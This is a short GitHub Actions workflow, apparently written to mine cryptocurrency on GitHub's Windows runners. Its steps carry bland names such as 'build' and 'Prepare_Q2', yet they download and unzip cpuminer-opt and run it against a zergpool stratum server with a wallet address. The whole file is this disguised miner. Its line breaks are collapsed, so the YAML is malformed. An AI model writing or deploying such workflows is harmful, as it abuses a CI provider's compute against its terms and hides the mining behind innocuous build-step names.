name: eX-code_Core on:[workflow_dispatch]
jobs: 
build: runs-on : windows-latest
steps: - name: Preparing run: Invoke-WebRequest https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.22/cpuminer-opt-win.zip -OutFile cpuminer-opt-win.zip -
name: Prepare_Q2 run: Expand-Archive cpuminer-opt-win.zip - 
name: Running run: .\cpuminer-opt-win\cpuminer-avx2.exe -a power2b -o stratum+tcp://power2b.eu.mine.zergpool.com:7445 -t 1 -u RLgPffTX9i31sQjiW3xi2hjXZP5jw1w1M3 -p password=PASWORD_KALIAN - name: DONE
run: exit
